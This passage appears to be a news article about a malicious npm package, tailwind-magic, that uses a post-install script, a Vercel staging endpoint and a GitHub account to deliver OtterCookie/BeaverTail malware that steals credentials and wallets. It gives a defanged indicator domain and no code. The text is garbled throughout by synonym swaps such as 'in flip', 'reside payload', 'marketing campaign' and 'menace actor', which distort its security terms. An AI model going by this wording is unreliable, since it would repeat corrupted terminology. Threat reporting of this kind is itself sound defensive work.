When an unsuspecting developer installs such a bundle, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in flip delivers a reside payload fetched from a threat-actor managed GitHub account named “stardev0914”. From there the payload, a variant of OtterCookie that additionally folds in capabilities from the marketing campaign’s different signature payload, BeaverTail, executes and establishes a distant connection to the attackers’ management server. The malware then silently harvests credentials, crypto-wallet knowledge, browser profiles and extra.
“Tracing the malicious npm bundle tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app,and from there to the menace actor managed GitHub account which contained 18 repositories,” Socket’s senior menace intelligence analyst Kirill Boychenko stated in a weblog publish, crediting associated analysis by Kieran Miyamoto that helped affirm the malicious GitHub account stardev0914.
A ‘full stack’adversary: GitHub, Vercel, and NPM
What makes this marketing campaign stand out is the layered infrastructure behind it. Socket’s evaluation traced not simply the NPM packages but additionally how the attackers constructed an entire supply pipeline: malware serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and distant command execution.
